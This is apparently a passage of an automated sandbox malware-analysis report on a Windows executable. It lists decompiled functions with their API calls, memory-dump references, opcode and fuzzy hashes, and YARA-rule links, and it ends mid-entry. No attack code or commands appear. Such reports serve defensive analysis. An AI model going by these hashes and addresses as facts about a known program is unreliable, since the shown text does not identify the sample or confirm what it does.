                                • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                • memcpy.MSVCRT ref: 0040A94F
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@$memcpy$mallocwcslen
                                • String ID:
                                • API String ID: 3023356884-0
                                • Opcode ID: 06d55d015effc70acd74e478c994c183d172d3427711bbbf529aa76388b8a4f4
                                • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                • Opcode Fuzzy Hash: 06d55d015effc70acd74e478c994c183d172d3427711bbbf529aa76388b8a4f4
                                • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B1D1, Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                Download Yara Rule
                                APIs
                                • wcslen.MSVCRT ref: 0040B1DE
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                • memcpy.MSVCRT ref: 0040B248
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@$memcpy$mallocwcslen
                                • String ID:
                                • API String ID: 3023356884-0
                                • Opcode ID: 55719513f3c8c6a4818e587f66b1c7bf3b90e20bc37ea3706ff576a8bf766f00
                                • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                • Opcode Fuzzy Hash: 55719513f3c8c6a4818e587f66b1c7bf3b90e20bc37ea3706ff576a8bf766f00
                                • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041298C, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy
                                • String ID: @
                                • API String ID: 3510742995-2766056989
                                • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040AED2, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??2@??3@memcpymemset
                                • String ID:
                                • API String ID: 1865533344-0
                                • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B0D1, Relevance: 6.1, APIs: 4, Instructions: 55stringCOMMON
                                Download Yara Rule
                                APIs
                                • strlen.MSVCRT ref: 0040B0D8
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                • memcpy.MSVCRT ref: 0040B159
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@$memcpy$mallocstrlen
                                • String ID:
                                • API String ID: 1171893557-0
                                • Opcode ID: 5f5cf0e2ccb26b68d052b3089763840940e474cd8aa0f667cd2bbd6406438f01
                                • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                • Opcode Fuzzy Hash: 5f5cf0e2ccb26b68d052b3089763840940e474cd8aa0f667cd2bbd6406438f01
                                • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004144BB, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 004144E7
                                  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                  • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                • memset.MSVCRT ref: 0041451A
                                • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                • String ID:
                                • API String ID: 1127616056-0
                                • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0042FE8B, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy$memset
                                • String ID: sqlite_master
                                • API String ID: 438689982-3163232059
                                • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00414D8A, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                Download Yara Rule
                                APIs
                                • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                • wcscpy.MSVCRT ref: 00414DF3
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: BrowseFolderFromListMallocPathwcscpy
                                • String ID:
                                • API String ID: 3917621476-0
                                • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00410FB4, Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                • _snwprintf.MSVCRT ref: 00410FE1
                                • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                • _snwprintf.MSVCRT ref: 0041100C
                                • wcscat.MSVCRT ref: 0041101F
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                • String ID:
                                • API String ID: 822687973-0
                                • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00417434, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                Download Yara Rule
                                APIs
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74B05970,?,0041755F,?), ref: 00417452
                                • malloc.MSVCRT ref: 00417459
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74B05970,?,0041755F,?), ref: 00417478
                                • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ByteCharMultiWide$??3@malloc
                                • String ID:
                                • API String ID: 4284152360-0
                                • Opcode ID: 35e3d96e4e8f16596d993fb63affbe7c511ca80ecd689a4fb8a2c9eba3d4a450
                                • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                • Opcode Fuzzy Hash: 35e3d96e4e8f16596d993fb63affbe7c511ca80ecd689a4fb8a2c9eba3d4a450
                                • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004123E2, Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                • RegisterClassW.USER32(00000001), ref: 00412428
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: HandleModule$ClassCreateRegisterWindow
                                • String ID:
                                • API String ID: 2678498856-0
                                • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00409B32, Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetDlgItem.USER32(?,?), ref: 00409B40
                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: MessageSend$Item
                                • String ID:
                                • API String ID: 3888421826-0
                                • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00417B5E, Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00417B7B
                                • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                • GetLastError.KERNEL32 ref: 00417BB5
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: File$ErrorLastLockUnlockmemset
                                • String ID:
                                • API String ID: 3727323765-0
                                • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004173E4, Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                • malloc.MSVCRT ref: 00417407
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ByteCharMultiWide$??3@malloc
                                • String ID:
                                • API String ID: 4284152360-0
                                • Opcode ID: a2ae8ec016122b8f6e3efdb0c2476e7f426d1c5b61e32c0c73e3f87cc7c6b3a1
                                • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                • Opcode Fuzzy Hash: a2ae8ec016122b8f6e3efdb0c2476e7f426d1c5b61e32c0c73e3f87cc7c6b3a1
                                • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040F64E, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 0040F673
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                • strlen.MSVCRT ref: 0040F6A2
                                • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                • String ID:
                                • API String ID: 2754987064-0
                                • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040F6BD, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 0040F6E2
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                • strlen.MSVCRT ref: 0040F70D
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                • String ID:
                                • API String ID: 2754987064-0
                                • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00402FB2, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00402FD7
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                • strlen.MSVCRT ref: 00403006
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                • String ID:
                                • API String ID: 2754987064-0
                                • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041437B, Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                • String ID:
                                • API String ID: 764393265-0
                                • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A751, Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                Download Yara Rule
                                APIs
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Time$System$File$LocalSpecific
                                • String ID:
                                • API String ID: 979780441-0
                                • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004134C6, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                Download Yara Rule
                                APIs
                                • memcpy.MSVCRT ref: 004134E0
                                • memcpy.MSVCRT ref: 004134F2
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy$DialogHandleModuleParam
                                • String ID:
                                • API String ID: 1386444988-0
                                • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00411D08, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InvalidateMessageRectSend
                                • String ID: d=E
                                • API String ID: 909852535-3703654223
                                • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
